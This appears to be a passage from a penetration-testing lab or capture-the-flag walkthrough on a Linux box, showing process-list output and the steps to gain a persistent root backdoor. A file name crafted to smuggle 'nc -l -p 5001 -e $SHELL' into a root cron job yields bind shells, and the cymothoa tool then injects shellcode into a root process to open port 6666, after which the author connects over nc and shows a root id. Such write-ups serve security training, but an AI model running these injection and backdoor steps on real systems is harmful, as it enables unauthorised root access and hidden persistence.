 4797 ?        Sl     1:38 /usr/sbin/mysqld –basedir=/usr –datadir=/var/lib/mysql –user=mysql –pid-file=/var/run/mysqld/mysqld.pid –skip-external-locking –port=3306 –socket=/var/run/mysqld/mysqld.sock
 4798 ?        S      0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
 4901 ?        S      1:01 /usr/bin/python /usr/bin/knockknock-daemon
 4902 ?        S      0:00 /usr/bin/python /usr/bin/knockknock-daemon
 4922 ?        Ss     0:00 /usr/sbin/atd
 4933 ?        Ss     0:00 /usr/sbin/cron
 4955 ?        Ss     0:05 /usr/sbin/apache2 -k start
 4974 tty1     Ss+    0:00 /sbin/getty 38400 tty1
 4975 ?        S      0:04 /usr/sbin/apache2 -k start
 4977 ?        S      0:03 /usr/sbin/apache2 -k start
 4978 ?        S      0:03 /usr/sbin/apache2 -k start
 4979 ?        S      0:03 /usr/sbin/apache2 -k start
 4981 ?        S      0:03 /usr/sbin/apache2 -k start
 5584 ?        S      0:03 /usr/sbin/apache2 -k start
 7402 ?        S      0:00 /usr/sbin/apache2 -k start
 7403 ?        S      0:00 /usr/sbin/apache2 -k start
 7404 ?        S      0:01 /usr/sbin/apache2 -k start
 7405 ?        S      0:00 /usr/sbin/apache2 -k start
23643 ?        Z      0:00 [sh]
24856 ?        Ss     0:00 sshd: alamo [priv]
24858 ?        S      0:00 sshd: alamo@pts/0
24859 pts/0    Ss+    0:00 -bash
26707 ?        S      0:00 /USR/SBIN/CRON
26708 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
26709 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
26714 ?        S      0:00 sh -c cp /home/development/<`nc -l -p 5001 -e $SHELL` /var/lib/changetrack/home:development:<`nc -l -p 5001 -e $SHELL`
26715 ?        S      0:00 sh
26721 ?        S      0:00 /USR/SBIN/CRON
26722 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
26723 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
26730 ?        Z      0:00 [cron]

26745 ?        S      0:00 sh -c cp /home/development/<`nc -l -p 5001 -e $SHELL` /var/lib/changetrack/home:development:<`nc -l -p 5001 -e $SHELL`
26748 ?        S      0:00 nc -l -p 5001 -e /bin/sh
27381 ?        Z      0:00 [cron]

27384 ?        S      0:00 /USR/SBIN/CRON
27385 ?        Ss     0:00 /bin/sh -c /usr/local/bin/changetrack -q
27386 ?        S      0:00 /usr/bin/perl /usr/local/bin/changetrack -q
27391 ?        S      0:00 sh -c cp /home/development/<`nc -l -p 5001 -e $SHELL` /var/lib/changetrack/home:development:<`nc -l -p 5001 -e $SHELL`
27393 ?        Z      0:00 [cron]

27394 ?        S      0:00 nc -l -p 5001 -e /bin/sh
27396 ?        R      0:00 ps ax
chmod +x cymothoa
./cymothoa -p 26708 -s 0 -y 6666
[+] attaching to process 26708

 register info:
 ———————————————————–
 eax value: 0xfffffe00   ebx value: 0xffffffff
 esp value: 0xbf94de6c   eip value: 0xb7f8a410
 ————————————————————

[+] new esp: 0xbf94de68
[+] injecting code into 0xb7f8b000
[+] copy general purpose registers
[+] detaching from 26708

[+] infected!!!

   >   >

Nice! now open a terminal and connect to our backdoor on port 6666

root@bt:/pentest/backdoors/cymothoa# knockknock -p 6666 192.168.53.129
*** Success: knock sent.
root@bt:/pentest/backdoors/cymothoa# nc 192.168.53.129 6666
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root

Remember to use SUID process (owned by root) or you will have only a normal user shell when running (infect) cymothoa on a normal user process. Finish.